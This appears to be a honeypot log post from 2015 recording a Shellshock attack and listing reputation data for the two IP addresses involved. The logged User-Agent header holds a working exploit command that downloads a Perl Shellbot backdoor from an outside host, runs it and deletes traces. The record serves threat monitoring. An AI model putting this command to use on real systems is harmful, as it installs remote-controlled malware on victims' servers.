Dienstag, 6. Oktober 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, Zonealarm reports a
Backdoor.Perl.Shellbot.s


62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186